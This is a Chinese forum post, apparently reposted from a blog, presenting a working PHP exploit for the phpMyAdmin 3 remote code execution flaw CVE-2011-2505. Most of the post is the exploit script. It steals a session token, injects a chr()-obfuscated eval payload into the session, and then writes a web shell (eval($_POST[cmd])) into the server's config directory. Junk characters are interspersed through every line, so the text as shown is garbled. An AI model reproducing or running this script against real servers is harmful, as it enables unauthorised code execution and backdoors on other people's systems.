最近在家做专职奶爸,不谙圈内事很多months了,博客也无更新。 C+ s Q7 V6 V3 p6 G
5 a; a# D2 @$ V9 v9 q5 O, v, b昨夜带孩子整夜未眠,看到黑哥在php security群里关于phpmyadmin3漏洞的讨论,虽然之前没看过漏洞代码,不过前段时间还是在微博上看到wofeiwo的exp了,不过据黑哥说有不鸡肋的利用方法,于是夜里翻代码出来研究了翻,写出了这个冷饭exp,由于我搞的晚了,之前已经很多人研究了写exp了,于是我这个属于炒冷饭,权当研究研究打发时间了。
- k. C( o+ Y( ^' q& |/ r8 A( j) z# ]8 m3 O" ~
首先赞下wofeiwo的python版本的exp,再赞下wofeiwo跟superhei的钻研精神,学习的榜样啊。不过之前那个exp利用起来是有一些限制的:1 P- h4 a- r4 Q+ d! j) R! k
一是session.auto_start = 1;
6 S4 G1 Z4 k$ t$ o0 ?. u二是pma3默认代码里libraries目录已经用.htaccess控制了不允许访问。
# H6 W. i/ B7 ?- `* `9 W当然还有第三点大家都不可以逾越的鸿沟:config目录存在且可写。9 r* j2 z! h/ o- x0 K, q9 i0 m
2 q- V, H- `; w: D9 G' J8 ?- B% J
在群里看了黑哥的发言后,再看了下代码,发现前两点利用限制均可以无视。所以其实这个漏洞还真的可以不是那么鸡肋。
, f3 e3 Y# z6 ]0 u" M' ]. S$ F$ M8 P) e# g; s8 ?
于是写了这个php版本的exp,代码如下:
" p6 K. C" E7 t3 r, ^' }; A; h
8 @8 L; r0 L, X- y) P+ h- w#!/usr/bin/php
+ J. k3 o# M* Q2 u) N3 y4 g' D<?php, ?/ A L4 u( E- j# y
print_r('
+ A/ `3 F, }6 b% Y% @. q) Y* J! z+---------------------------------------------------------------------------+
; _: f7 J- G O" k' ^pma3 - phpMyAdmin3 remote code execute exploit [Not jilei(chicken\'s ribs)]
/ E1 R! S6 p% @ c0 nby oldjun(www.oldjun.com)
7 X* A5 h7 x# O' Swelcome to www.t00ls.net
2 M0 b! a- G( G9 A* n7 @( F$ Gmail: oldjun@gmail.com% _: U. S' q; X( f
Assigned CVE id: CVE-2011-2505: h" I# ~3 E! L3 \3 S. y
+---------------------------------------------------------------------------+, x6 e- ^+ Q$ U5 F
');
! c6 V9 k7 K7 s( O N5 J8 @# e2 T6 a. C
/**
. r( U5 @, y, }) U1 h) l * working when the directory:"config" exists and is writeable.
' N b0 _. {; E O9 c**/
7 Y) s8 T# Q+ s' }2 `
9 G7 H- Q1 }( r% [1 w+ Hif ($argc < 3) {
' q- ^) t! n( t1 d+ _7 e print_r('0 I4 m- y3 ~! d# W" p9 B% k+ H
+---------------------------------------------------------------------------+
1 M% {# {4 T- b! `Usage: php '.$argv[0].' host path4 m0 p$ L; `" ^
host: target server (ip/hostname)7 O2 C% J/ d6 L H
path: path to pma3
/ }$ r: w0 b* P! m; }Example:8 l: w, {! g& C$ }# I7 G
php '.$argv[0].' localhost /pma/5 G, H7 ?' t! Y5 h* B! p
+---------------------------------------------------------------------------+
2 Z: P H: S) b) j6 z( s');
4 U$ l9 g* B1 z' d+ B exit;
, Q6 G; p% w: `/ t! g}
N. u: {# r, p4 a4 Y* W b
) y0 U& ^+ O5 E# x, j$host = $argv[1];
' G: O( }$ }9 m+ j& @; A$path = $argv[2];/ `8 K$ \. n! B- T( K \* l% e
) R6 B6 g# y3 m' c" s$ \* H! F- I0 G/**2 v: C v7 ]/ k' t% |" \
* Try to determine if the directory:"config" exists
% ?7 r) H; o! _! W**/
" r* N- j1 R, l- O. F/ W8 X4 Eecho "[+] Try to determine if the directory:config exists....\n";
. M" n3 |, ^& J$returnstr=php_request('config/');
0 B8 }9 n. _ w d* a- aif(strpos($returnstr,'404')){
. y0 G I- [% H/ T$ z0 Z exit("[-] Exploit Failed! The directory:config do not exists!\n");& e4 S7 v; f% i% n0 C2 Q) T+ m- J" k
}1 s$ C# q1 m6 |/ p5 \; O
/ W6 |( j6 M" }! K6 e A8 I1 k/**- v0 j) B; e( i1 U
* Try to get token and sessionid' \- c' N3 Z. D6 U
**/
5 S) e, W! {3 r) U, Zecho "[+] Try to get token and sessionid....\n";
4 w& D6 n( y+ v, q$result=php_request('index.php');! e) i2 j" Z& ` L% q" Q
preg_match('/phpMyAdmin=(\w{32,40})\;(.*?)token=(\w{32})\&/s', $result, $resp);
* j- |9 ?) L7 U$token=$resp[3];+ p. Y" g- f- }* [3 p
$sessionid=$resp[1];2 O5 C; B$ `: i1 G: Z
if($token && $sessionid){
' B( u+ S* u( F( L( r echo "[+] token token\n";
# C- r+ N% |, |( S% U& _% A echo "[+] Session IDsessionid\n";
! ~2 w6 ?9 R2 g0 y6 {' A# Y}else{4 J# \) |. t# Z: G: O$ e" n; C
exit("[-] Can't get token and Session ID,Exploit Failed!\n");
" H$ a1 k) j$ o3 ^0 B4 m$ s}
& q1 e- h% A5 w
2 \. e+ B8 b) w; u' X% D/**% Z. A8 S/ j. _) _. ?" V! h1 d
* Try to insert shell into session+ K* B) r# ~% _! ?7 M
**/
3 b8 L% _+ Y& Recho "[+] Try to insert shell into session....\n";& T8 n- M' r& [7 h3 a+ S
php_request('db_create.php?token='.$token.'&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net','','phpMyAdmin='.$sessionid);//Actually,almost all the php files in home directory of pma3 can be used here.
/ P" w: q2 P9 F% d/ d
& Y# u2 ? E# s R9 |: v/**3 u/ d5 A; ~, T5 n
* Try to create webshell
9 y4 Y2 ^& r' u$ j' b**/8 b0 B6 i2 S3 ?
echo "[+] Try to create webshell....\n";1 p$ y$ }! T5 g3 x& E, c3 p
php_request('setup/config.php','phpMyAdmin='.$sessionid.'&tab_hash=&token='.$token.'&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save','phpMyAdmin='.$sessionid);
- E# ~ F) C0 F4 @1 C/**
" j! r& b) o3 v d * Try to check if the webshell was created successfully
* V; ^0 G% m$ e**/
/ H7 T) P: Q, [$ Gecho "[+] Try to check if the webshell was created successfully....\n";
+ I- G8 I/ _% G* b$content=php_request('config/config.inc.php');
, O# Z# r! w* j, l# ^+ }if(strpos($content,'t00ls')){
4 U0 \ N. g& e$ O7 | echo "[+] Congratulations! Expoilt successfully....\n";
7 [% k- q+ l, N echo "[+] Webshell:http://$host{$path}config/a.php eval(\$_POST[cmd])\n";. {5 O! r8 J7 Z6 _
}else{
5 J* i0 N( v9 I exit("[-] Exploit Failed! Perhaps the directory:config do not exists or is not writeable!\n");3 P; Z/ n* k7 b; o& o# M
}
/ a9 w3 ?0 ~7 C: |9 I9 O
: j' j4 P+ h6 f' N2 s( A4 B0 r+ E& Mfunction php_request($url,$data='',$cookie=''){. O7 H+ @5 D7 I# S1 L8 y0 e
global $host, $path;
; |: K$ n* k% t% _& `' B
6 m# {- a" T! x9 _) Y2 J/ k8 j $method=$data?'POST':'GET';/ J# Y. S O! X( N: M# ]+ _9 q- @" D
$ \; v' b/ N9 e$ c8 X. @ $packet = $method." ".$path.$url." HTTP/1.1\r\n";
, s: [7 D c! N4 w $packet .= "Accept: */*\r\n";
6 ?3 D; }6 K8 G3 t $packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";1 r! l* g- W: t2 K
$packet .= "Host: $host\r\n";
) R, L$ L" w$ r8 o. X $packet .= $data?"Content-Type: application/x-www-form-urlencoded\r\n":"";6 C. J d# n) m3 ~; r5 n) T3 ?
$packet .= $data?"Content-Length: ".strlen($data)."\r\n":"";
' z: V# C7 M, A R5 N $packet .= $cookie?"Cookie: $cookie\r\n":"";" h- N% Q1 A7 W( v3 a
$packet .= "Connection: Close\r\n\r\n";2 r0 ]/ q2 G/ f; ?
$packet .= $data?$data:"";4 A3 D0 ?( ]! g' u# f2 a
; y2 A7 n/ M' I# E7 ?
$fp = fsockopen(gethostbyname($host), 80);4 b F3 r* g; ]% c+ s
if (!$fp) {
" W5 `% u1 @+ \) |, l echo 'No response from '.$host; die;
: v- n1 a6 @# v* d) ?0 o) w- c }
* K$ S6 L, v7 }/ c# q fputs($fp, $packet);6 {2 j7 }! n. \) R( t/ A
# ~- ~8 k' M+ r) v
$resp = '';7 S" I: p" g1 D I. N6 }
2 F' j- g( r0 p; \- E while ($fp && !feof($fp))
$ `4 c* E6 k/ ]; K& `* _ O9 _ $resp .= fread($fp, 1024);# h7 [! t; u% M/ M* Y" u
9 O" Q# Q- r9 d/ G y6 u: M
return $resp;
, T5 K% O6 ]9 h& B) K) s# p5 _}0 o/ e% i9 i2 x/ J; e
# @" `% d! `: \/ ~) H
?>
$ N0 H0 m9 G4 s. W( _; h. r. |
发表于 2013-2-21 09:13:03
收藏
支持
反对